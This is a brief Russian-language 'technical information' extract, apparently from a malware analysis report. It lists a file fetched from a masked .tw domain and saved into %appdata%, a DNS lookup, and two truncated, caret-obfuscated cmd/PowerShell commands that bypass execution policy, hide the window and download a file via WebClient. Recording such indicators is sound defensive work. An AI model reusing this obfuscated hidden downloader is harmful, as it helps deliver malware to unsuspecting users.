Техническая информация
- http://lt##.#rimename.tw/file/hen.trf как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^eRshE^ll.exE^ ^-Exe^c^utI^O^N^pOLI^c^y^ b^y^pAsS -^nO^prO^fIL^E -^W^inD^ow^stYLe^ ^hI^D^dEN ^(nE^W-^oBJEC^t sysTEm.nEt.W^ebcLiE^nT).^DOWn^L^OaDF^IlE('http://lt##.#rimename...
- DNS ASK lt##.#rimename.tw
- '<SYSTEM32>\cmd.exe' /C "POW^eRshE^ll.exE^ ^-Exe^c^utI^O^N^pOLI^c^y^ b^y^pAsS -^nO^prO^fIL^E -^W^inD^ow^stYLe^ ^hI^D^dEN ^(nE^W-^oBJEC^t sysTEm.nEt.W^ebcLiE^nT).^DOWn^L^OaDF^IlE('http://lt##.#rimename...' (со скрытым окном)